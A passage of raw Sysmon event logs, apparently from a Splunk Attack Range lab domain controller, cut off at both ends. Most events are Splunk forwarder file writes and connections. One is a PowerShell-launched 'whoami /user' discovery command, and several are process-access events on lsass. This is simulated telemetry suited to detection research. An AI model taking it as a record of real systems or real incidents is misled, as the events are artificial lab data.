Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=975C918224308A47DE58B2841CF72628,SHA256=E52AA344833F0CD23E31CFA8F03B701E5E94E6D02A309A139D92680CA1F61193,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034945Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:06.378{CB3070D7-7A31-6042-B100-00000000AD01}4512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DC9AD7EB5BE44D8EE59D24618A79C5C4,SHA256=8DE7A8538873D10460CEB6E51488433EAFD48E6E9813E3E2FA7562BB7A929184,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034949Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:07.550{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21A58B686C72C7D549620C7D9304A35E,SHA256=7D91FFE1832264749C9EFB6A85D2359F99F925E7B49A970A07B9556221A99079,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034948Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:07.550{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CCC11C04D31923099FD6AEF0694740D2,SHA256=F3F9834E19261A6175692E37DC6BE0AD092FE5E3C756639E73763DEA44FBA0AF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000034947Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:04.357{CB3070D7-7A38-6042-DF00-00000000AD01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-725.attackrange.local61913-false10.0.1.12-8000- 23542300x800000000000000034952Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:08.722{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DE4337E1C11372504FB540DDEF092860,SHA256=5F1A7D90ED190A4B28D184EF91C240493BF2207EDFA79526FF71A5F46A8F4F8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034951Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:08.722{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7569B489D9D85E03500153D538E4A97,SHA256=840090066EF78AD5357E965CC95355F6F91C5390778316EA7DD5155C625E6FDE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000034950Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:04.574{CB3070D7-7A31-6042-B100-00000000AD01}4512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-725.attackrange.local61914-false10.0.1.12-8089- 23542300x800000000000000034953Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:09.871{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA4FAD8DD4B030F4E0D82E1BDE02140B,SHA256=850122D6BD908A80A101D7A907E41E1AE86F3FF1F1C35F7FFBB1B07EB91C63A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034954Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:10.673{CB3070D7-863B-6042-C506-00000000AD01}6096ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\s9ypppcg.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=4D07B4B61CD09B9C84190C8EE100744E,SHA256=D01401153DC32C64185537760CE2E4F53F821704EBAE3485664745FFDFC5902F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034956Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:11.661{CB3070D7-863B-6042-C506-00000000AD01}6096ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\s9ypppcg.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=81EA168133574318ABC7E896A11FD9C9,SHA256=D607B411032328DAF8D72F1EF2AF6BB3DFF0366F12F3A4CED5B6435E3B95438F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034955Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:11.028{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B98E0625CC0BFACD9B62592D5A0FC5ED,SHA256=00A61F7FBCE1687314D2A0944A5F16A3522DE62DF9B3AB413BF2C99B8C895EF5,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000034959Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:09.370{CB3070D7-7A38-6042-DF00-00000000AD01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-725.attackrange.local61915-false10.0.1.12-8000- 23542300x800000000000000034958Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:12.193{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F131ADA4A8B22185169125774B7262EC,SHA256=EBA72C0AF4B926884FE62796562B12230EE8026EF9E20B970A105C0805B7A156,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034957Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:12.193{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=42023256DF9553FB33AC8DC521FEA49A,SHA256=E474DE4D1B030B308820C0718D059C4EF43E5AB2235B5236B4F9B3B3CA617E28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034960Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:13.349{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A329388592872BC692812F63A1F73EC9,SHA256=996963ADE0E83D9C5DD089192C61FBF0AA59D245D8A1AF3BCD7A51CD362546D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034962Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:14.517{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=916E2E1485E6B3379033D61CDAE63CD3,SHA256=ED3DB0B098A58BD666F8DF3A34A523D7112738B8D2562516096EA7B7F83D70BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034961Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:14.515{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A08EC165886C0B51DDC64A9BF398ADA2,SHA256=EE357CE2464277A5E255A2B837D5B899689ACC3D5FB5FAA9F16A96A4B1619F73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034963Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:15.655{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02B1207BECF58974068861D70FF7175B,SHA256=F8A649CABE72BDE81B70A056FE0709B0E2F058BA86817B5EEE78FE13DF4A0B05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034964Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:16.821{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04240ED31AC51A4C34D4E6ACE3A436B2,SHA256=B9F028BD73BB69B4E82F103CB168389E18952FB07351FB4A3470A9A1B0DF0A4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034969Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:17.825{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79CF9C152A05D876898BAF7CE7E06853,SHA256=40F7A4A39DEFBBF10983493303755C90AEA09E0EE3BC3D0CCC90D45F89B95259,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000034968Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:14.383{CB3070D7-7A38-6042-DF00-00000000AD01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-725.attackrange.local61916-false10.0.1.12-8000- 23542300x800000000000000034967Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:17.406{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7DF30DD31D9F3D67AA110B62E250647A,SHA256=EE90B13038F9BC7A1D28DA8FCB4D408FD8C2C9E584C08490AE184E8CACBCE988,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034966Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:17.406{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2B0D11A7AB710B2B5DF9C984DFE3F8CF,SHA256=E3CFB5B4D951DBB44CB2F2EF4F5B158827C3570308B4FF617C4C6514EDCE9B01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034965Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:17.406{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=99687E6B0C8B47342D68EAC23332FD14,SHA256=0E3F3B2595AA6A8430D5E30C8B1CAE9272952CF700BD7C7CF3EF9487F10EA4A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034970Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:18.847{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B089F4ABA9F1CA001EF1BFFBB6B1F85,SHA256=9FF6C512CCC824551181DBC9DEDC3B183C024D8A6D29C1A73F19CA5AACE430A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034971Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:19.850{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3399809668E2289FEB80ECE5CE469F9,SHA256=1A15E7B00C01F2062968499E50135032BBE69A339522404EFF09BC203E8783C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034972Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:20.852{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B875398DEF724FBD8E8EFA689E5077B0,SHA256=1F0C2F2088F878E0A9DF6E6947F1B8FDF6EE28626854EFEFDBF9DA964E7A9EAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034973Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:21.855{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48D4FC5D6A45B803D35EDDD2A6FC4011,SHA256=5D829FC92EC59B2433515447866BD0503CE9AD17A495BA884BEA0D24B6A24DCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034976Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:22.858{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36C4CF631E6DECCC70CD31C637688B24,SHA256=34ADC1B1815238796D8E0E960CD6627478355546836BE163887238F8006DC6B3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000034975Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:19.427{CB3070D7-7A38-6042-DF00-00000000AD01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-725.attackrange.local61917-false10.0.1.12-8000- 23542300x800000000000000034974Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:22.218{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2B0D11A7AB710B2B5DF9C984DFE3F8CF,SHA256=E3CFB5B4D951DBB44CB2F2EF4F5B158827C3570308B4FF617C4C6514EDCE9B01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034977Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:23.860{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABE2940D50755BA45EB5D00178201F1A,SHA256=ABD4CE27ED36121C9CE840663EE273FDC1CEEBD2E731DCDD90B0201667EB7964,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034978Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:24.863{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D6E7C1BD9E1ED8504051204291E4243,SHA256=D9A039002A80A9C763589E6DE966294691275A3B72DF6F1A94D24F818BFD547C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034979Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:25.865{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41785560AE4FB56B5F527B5AC676385A,SHA256=8BF25E5D4C5C9157400E3BCFEC5744840FD76D97FBEB015C39F16694FA0C2C64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034988Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:26.868{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADE2B0E2644F3BC5E739AA5AED4F7BE7,SHA256=7F2CEDC4FB08E999A49E8D9EEAFAD2B65F449ED996F09002E15D25FFD2595C3C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000034987Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:26.747{CB3070D7-8517-6042-7F06-00000000AD01}69766996C:\Windows\system32\conhost.exe{CB3070D7-8E8E-6042-EB07-00000000AD01}5436C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034986Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:26.730{CB3070D7-7998-6042-0C00-00000000AD01}8526012C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034985Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:26.730{CB3070D7-7998-6042-0C00-00000000AD01}8526012C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034984Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:26.730{CB3070D7-7998-6042-0C00-00000000AD01}8526012C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034983Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:26.730{CB3070D7-7998-6042-0C00-00000000AD01}8526012C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034982Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:26.730{CB3070D7-84F0-6042-4506-00000000AD01}49562756C:\Windows\system32\csrss.exe{CB3070D7-8E8E-6042-EB07-00000000AD01}5436C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000034981Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:26.730{CB3070D7-8517-6042-7E06-00000000AD01}69567108C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{CB3070D7-8E8E-6042-EB07-00000000AD01}5436C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|UNKNOWN(00007FFFAFCF331B)|UNKNOWN(00007FFFAF1941A5)|UNKNOWN(00007FFFAF193E76)|UNKNOWN(00007FFFAFC454DB)|UNKNOWN(00007FFFAF154A0C)|UNKNOWN(00007FFFAF1B2EDB)|UNKNOWN(00007FFFAF196540)|UNKNOWN(00007FFFAF196540)|UNKNOWN(00007FFFAF196540)|UNKNOWN(00007FFFAF196540)|UNKNOWN(00007FFFAF1963D1)|UNKNOWN(00007FFFAF188356)|UNKNOWN(00007FFFAF1C14E6)|UNKNOWN(00007FFFAF1C1189)|UNKNOWN(00007FFFAF1B83CC)|UNKNOWN(00007FFFAF1941A5)|UNKNOWN(00007FFFAF193E76) 154100x800000000000000034980Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:26.744{CB3070D7-8E8E-6042-EB07-00000000AD01}5436C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe" /userC:\Users\Administrator\ATTACKRANGE\Administrator{CB3070D7-84F1-6042-49AD-440000000000}0x44ad492HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{CB3070D7-8517-6042-7E06-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000034994Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:03:27.367{CB3070D7-7998-6042-0C00-00000000AD01}8526012C:\Windows\system32\svchost.exe{CB3070D7-7997-6042-0B00-00000000AD01}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+